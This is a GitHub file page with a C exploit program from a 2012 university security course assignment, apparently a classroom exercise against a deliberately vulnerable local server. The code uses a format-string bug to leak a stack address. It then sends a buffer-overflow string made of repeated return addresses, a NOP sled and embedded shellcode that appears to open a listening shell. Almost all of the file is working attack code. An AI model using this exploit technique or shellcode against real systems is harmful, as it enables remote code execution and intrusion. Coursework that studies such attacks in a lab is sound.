forked from oghie/stackoverflow-exploit-selinux
-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.c
182 lines (142 loc) · 5.66 KB
/
exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
/*
================================
CA647 2012 Assignment
================================
================================
Student Info
================================
This is a group of 3
Student Name: Shay Roe
Student Number: 12212239
Student Name: John Ryan
Student Number: 12211911
Student Name: Karl O Hinneirghee
Student Number: 12212130
================================
Brief Description
================================
Our exploit program constructs an attack string and launches an attack on
the vulnerable server.
Our exploit program takes advantage of two vulnerabilities within the server code in order
to construct our attack string and launch our attack.
1. Format string vulnerablility in the read_name function
2. A buffer overflow vulnerability in the read_message function
Structure Of Attack String
[ Return Addresses - ShellCode - NOP SLED ]
Further details can be found in description.txt
================================
*/
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <netdb.h>
#include <time.h>
#define PORTNUM 8001 // Port server is listening on
#define BLENGTH 256 // Length of declared buffers below
char buffer_addr[10]; //Used to store our stack start address obtained by exploiting the format string vulnerability
long stack_start_address; //Stores our stack start address obtained later
// ===================================
// SHELLCODE
// ===================================
// Note: This code was obtained online at http://www.shell-storm.org
// URL: http://www.shell-storm.org/shellcode/files/shellcode-672.php
//Port:
char shellcode[] =
"\x83\xc4\x80" // add esp, 0x40 - Stop overwriting shellcode
"\x6a\x66\x6a\x01\x5b\x58\x99\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x52\x66"
"\x68\xfc\x15\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x6a\x66\x58\x43\x43\x6a\x05\x56\xcd"
"\x80\x6a\x66\x58\x43\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x6a\x3f\x58\x31\xc9\xcd\x80\x6a\x3f\x58"
"\x41\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\x50\xb0\x0b\x59\xcd\x80";
static void
get_StackStart(int s)
{
char buffer[BLENGTH];
char response_buffer[] = "%p %p Heres the value %p %s";
/* Receive a prompt from the server */
recv(s, (void *)buffer, BLENGTH, MSG_WAITALL);
/* Send the response to the server */
send(s, (void *)response_buffer, BLENGTH, 0);
/* Receive a reply from the server */
recv(s, (void *)response_buffer, BLENGTH, MSG_WAITALL);
// Copy "stack start address" from &response_buffer[33] to buffer_addr
memcpy( buffer_addr, &response_buffer[32], 10 );
//convert the address of the "start stack address" to an unsigned long int
//This address will later be used to calculate our new retrun address
stack_start_address = strtoul(buffer_addr, (char**)0, 0);
}
/* Send our message to the server */
static void
send_exploit(int s)
{
int i;
long *addr_ptr, addr;
char buffer[BLENGTH]; //This will house our constructed attack string
char *ptr;
//Calculate OUR Return address that we'll use to overwrite the
//retrun address on the stack.
int new_returnAddress = stack_start_address-112;
//Conver address to required format (long)
addr = (long)new_returnAddress;
//Pointer to our buffer (attack string)
addr_ptr = (long *) buffer;
//================================
// --- Construct Attack String ---
//================================
//1. Return Addresses - Populate buffer with new return address
// Set all words in the buffer start of the buffer whewre we place the exploit
for (i = 0; i < BLENGTH; i+=4)
*(addr_ptr++) = addr;
//2. Set the start of the response buffer to NOPs
memset(buffer, 0x90, 32);
//3. Insert the shellcode after the NOPS
ptr = buffer;
ptr += 32;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
//4. Null terminate our attack string
buffer[BLENGTH - 1] = '\0';
/* Send the attack to the server */
send(s, (void *)buffer, BLENGTH, 0);
}
/* Connect and talk to the server */
int
main()
{
struct sockaddr_in server;
struct hostent *host;
int s;
/* Create an Internet family, stream socket */
s = socket(AF_INET, SOCK_STREAM, 0);
/* Did that work? */
if (s < 0) {
perror("socket()");
exit(EXIT_FAILURE);
}
/* We are running the server on localhost for the minute */
if ((host = gethostbyname("localhost")) == NULL) {
perror("gethostbyname()");
exit(EXIT_FAILURE);
}
/* Fill in the socket address structure */
memset((char *)&server, '\0', sizeof (server));
server.sin_family = AF_INET;
server.sin_port = htons(PORTNUM);
memcpy((char *)&server.sin_addr, host->h_addr_list[0], host->h_length);
/* Connect to the server */
if (connect(s, (struct sockaddr *)&server, sizeof (server)) < 0) {
perror("connect()");
exit(EXIT_FAILURE);
}
/* Get Stack Start Address*/
get_StackStart(s);
/* Construct our attack string and send to vulnerable server */
send_exploit(s);
/* Close the socket */
close(s);
return (0);
}